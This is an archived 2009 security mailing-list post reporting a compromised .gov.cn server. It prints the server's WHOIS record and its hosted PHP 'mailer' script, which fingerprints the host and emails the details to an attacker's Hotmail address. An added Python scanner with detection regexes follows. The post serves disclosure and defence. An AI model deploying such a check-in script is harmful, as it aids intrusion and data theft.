[nsp-sec] CN CERT to the WCP please
Jose Nazario
jose at arbor.net
Fri Aug 14 14:40:30 EDT 2009
popped .gov.cn box? please send to the appropriate people. looks like
a box at jssalt.gov.cn is being used as a mailer for attackers.
Domain Name: jssalt.gov.cn
ROID: 20061018s10061s00768421-cn
Domain Status: clientTransferProhibited
Registrant Organization: 江苏省盐务管理局 (Jiangsu Province Salt Administration Bureau)
Registrant Name: 江苏省盐务管理局 (Jiangsu Province Salt Administration Bureau)
Administrative Email: wqq at 71nc.com
Sponsoring Registrar: 厦门三五互联科技股份有限公司 (Xiamen 35.com Technology Co., Ltd.)
Name Server:ns3.dns-diy.com
Name Server:ns4.dns-diy.com
Registration Date: 2006-10-18 16:19
Expiration Date: 2016-10-18 16:19
URL: http://jssalt.gov.cn/box.txt
<script>
<!--
document.write(unescape("<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "
Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "total.tecnologia at hotmail.com";
$assunto = "lup@";
$email1 = "total.tecnologia at hotmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
"));
//-->
</script>
_____________________________
jose nazario, ph.d. jose at arbor.net
manager of security research, arbor networks
http://asert.arbor.net/
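Added defensive example, not part of the original post or of anyone's code quoted in it: a small Python scanner that flags PHP mailer scripts by the fingerprint of the box.txt sample above (PHP hidden in document.write(unescape(...)), execution limits disabled, safe_mode and php_uname() probed, mail() to a hard-coded free-webmail address, the victim's own URL reported back). The indicator set, the threshold and both sample files are constructed; the ' at ' form is accepted alongside '@' because the list archive renders addresses that way.

```python
import re
from typing import Dict, List

# Indicators mirroring the box.txt mailer; names and threshold are a constructed heuristic.
INDICATORS: Dict[str, re.Pattern] = {
    # PHP source smuggled inside a JavaScript unescape() string literal
    "php_inside_js_unescape": re.compile(r'document\.write\(\s*unescape\(\s*["\'][^"\']*<\?php', re.I),
    # execution limits switched off so the script can run indefinitely
    "no_execution_limit": re.compile(r'set_time_limit\(\s*0\s*\)|max_execution_time["\']\s*,\s*-1', re.I),
    # host probing: safe_mode, OS/PHP build, account the web server runs as
    "host_fingerprinting": re.compile(r'ini_get\(\s*["\']safe_mode["\']\s*\)|php_uname\(\)|get_current_user\(\)', re.I),
    # outbound mail sent from the web tier
    "calls_mail": re.compile(r'\bmail\s*\(', re.I),
    # hard-coded recipient at a free webmail provider ("at" covers archive-obfuscated text)
    "webmail_recipient": re.compile(r'["\'][\w.+-]+\s*(?:@|\sat\s)\s*(?:hotmail|gmail|yahoo)\.com["\']', re.I),
    # reports the compromised site's own URL back to the sender
    "self_url_report": re.compile(r'\$_SERVER\[[\'"]HTTP_HOST[\'"]\]\s*\.\s*\$_SERVER\[[\'"]REQUEST_URI[\'"]\]'),
}

def scan_php(source: str) -> List[str]:
    """Names of the indicators present in one file's text."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]

def is_mailer(source: str, threshold: int = 3) -> bool:
    """A benign contact form trips one or two indicators; the box.txt sample trips all six."""
    return len(scan_php(source)) >= threshold

def extract_recipients(source: str) -> List[str]:
    """Hard-coded addresses in string literals, normalised to user@host for blocking and IR."""
    hits = re.findall(r'["\']([\w.+-]+)\s*(?:@|\sat\s)\s*([\w.-]+\.\w+)["\']', source)
    return sorted({f"{user}@{host}" for user, host in hits})

# Constructed sample: a trimmed copy of the box.txt mailer, as the list archive rendered it.
MAILER_SAMPLE = r"""<script>
document.write(unescape("<?php
ini_set("max_execution_time",-1);
set_time_limit(0);
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$email1 = "total.tecnologia at hotmail.com";
if(mail($email1,"lup@",$UNAME . $SafeMode . $delet,"")){ echo "Isso, ja foi!"; }
?>"));
</script>"""

# Constructed sample: an ordinary contact form that also calls mail().
BENIGN_SAMPLE = r"""<?php
$to = "webmaster at example.org";
mail($to, "Contact form", $_POST["msg"]);
"""
```

Run scan_php() over every .php/.txt file under a web root and triage anything is_mailer() flags; extract_recipients() gives the addresses to watch for in outbound SMTP logs.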